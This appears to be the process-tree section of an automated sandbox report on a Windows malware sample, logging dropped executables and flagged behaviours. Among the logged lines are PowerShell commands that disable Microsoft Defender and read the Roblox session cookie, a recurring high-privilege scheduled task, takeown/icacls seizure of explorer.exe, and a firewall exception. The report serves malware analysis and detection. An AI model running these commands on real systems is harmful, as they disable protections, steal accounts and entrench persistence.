C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:14⤵PID:5128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4428 /prefetch:14⤵PID:2820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,5002777228148208988,9123423498902723567,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6148 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
PID:2700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K cipher.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:460 -
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:4352
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:5948
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:4700
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\Rover.exeRover.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\web.htm3⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff24b73cb8,0x7fff24b73cc8,0x7fff24b73cd84⤵PID:6104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,16598977508381551313,775870293518861730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1220
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\Google.exeGoogle.exe3⤵
- Executes dropped EXE
PID:6124
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\helper.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2484
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4720
-
-
C:\Windows\SysWOW64\PING.EXEping mrbeast.codes -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1168
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Google.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1032
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Rover.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1700
-
-
C:\Windows\SysWOW64\xcopy.exexcopy spinner.gif C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K bloatware.cmd3⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5364 -
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\bloatware\1.exe1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5900
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\bloatware\3.exe3.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 19005⤵
- Program crash
PID:3516
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵
- Blocklisted process makes network request
PID:3708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K SilentSetup.cmd4⤵
- System Location Discovery: System Language Discovery
PID:2676 -
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2196 -
C:\Users\Admin\AppData\Local\Temp\is-3NMPC.tmp\WinaeroTweaker-1.40.0.0-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-3NMPC.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$4006E,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1916 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f7⤵PID:2104
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweaker.exe /f8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f7⤵
- System Location Discovery: System Language Discovery
PID:3980 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweakerhelper.exe /f8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5388
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\regmess.exeregmess.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5124 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_33f302ce-91ee-4bd9-b2ca-6052505fb83f\regmess.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:3600 -
C:\Windows\SysWOW64\reg.exereg import Setup.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:5600
-
-
C:\Windows\SysWOW64\reg.exereg import Console.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:240
-
-
C:\Windows\SysWOW64\reg.exereg import Desktop.reg /reg:325⤵
- Sets desktop wallpaper using registry
PID:5092
-
-
C:\Windows\SysWOW64\reg.exereg import International.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:5388
-
-
C:\Windows\SysWOW64\reg.exereg import Fonts.reg /reg:325⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:6092
-
-
C:\Windows\SysWOW64\reg.exereg import Cursors.reg /reg:325⤵PID:3724
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:768
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\scary.exescary.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1604 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4448
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4696 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qj54n1FIf456.bat" "5⤵PID:3908
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:5356
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2124
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1624 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:4360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qYkVuNlfpnNi.bat" "7⤵PID:4916
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:4448
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2972
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1580 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:4264
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TpXygidPzO0J.bat" "9⤵PID:6152
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:6188
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6212
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6468 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:6648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SJGE4DNnIyq3.bat" "11⤵PID:6784
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:3356
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6868
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"12⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:2308 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:7160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\w0rD1n0oNQi8.bat" "13⤵PID:1960
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:6764
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6760
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"14⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:6204 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:2320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KdA8O4Svn2wZ.bat" "15⤵PID:6308
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:7092
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6284
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"16⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:1800 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:6528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1Wqh56JKwrBw.bat" "17⤵PID:6392
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:3948
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1720
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"18⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2776 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:6640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PPkdNMblouXw.bat" "19⤵PID:3704
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:6608
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7136
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"20⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6844 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:5072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4BTMbOVLADdI.bat" "21⤵PID:6960
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:7080
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7104
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"22⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2932 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:5292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AGi4g626jcSh.bat" "23⤵PID:6804
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:5472
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5192
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\the.exethe.exe3⤵
- Executes dropped EXE
PID:5956
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_5b2468a8-8ca8-46c8-bc3b-9f8a13da8faa\caller.cmd" "4⤵PID:5088
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\ac3.exeac3.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:2104
-
-
C:\Windows\SysWOW64\PING.EXEping trustsentry.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2992
-
-
C:\Windows\SysWOW64\PING.EXEping ya.ru -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1452
-
-
C:\Windows\SysWOW64\PING.EXEping tria.ge -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2344
-
-
C:\Windows\SysWOW64\xcopy.exexcopy bloatware C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:6224
-
-
C:\Windows\SysWOW64\xcopy.exexcopy beastify.url C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:6300
-
-
C:\Windows\SysWOW64\xcopy.exexcopy shell1.ps1 C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:6328
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\explorer.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6796
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:7012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\System32\dwm.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4628
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\System32\dwm.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7004
-
-
C:\Windows\SysWOW64\xcopy.exexcopy xcer.cer C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:4180
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5716
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3024
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\freebobux.exefreebobux.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3276 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F8E2.tmp\freebobux.bat""4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4292 -
C:\Users\Admin\AppData\Local\Temp\F8E2.tmp\CLWCP.execlwcp c:\temp\bg.bmp5⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:6264
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\F8E2.tmp\x.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:3880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\SolaraBootstraper.exeSolaraBootstraper.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5552 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7032
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5452 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:6932
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"5⤵
- Views/modifies file attributes
PID:3776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:7020
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵PID:3356
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵PID:4324
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:6912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1700
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:4636
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7148 -
C:\Windows\system32\PING.EXEping localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2708
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6256 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:6344 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:6264
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ctfmon.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\wim.dllwim.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7108 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_37f8e688-6b86-4309-8844-fbf64c1c1424\load.cmd" "4⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5940 -
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_37f8e688-6b86-4309-8844-fbf64c1c1424\cringe.mp4"5⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1696
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_d009dafa-f60a-459d-bcc2-0944f6790e2d\web2.htm3⤵PID:5212
-
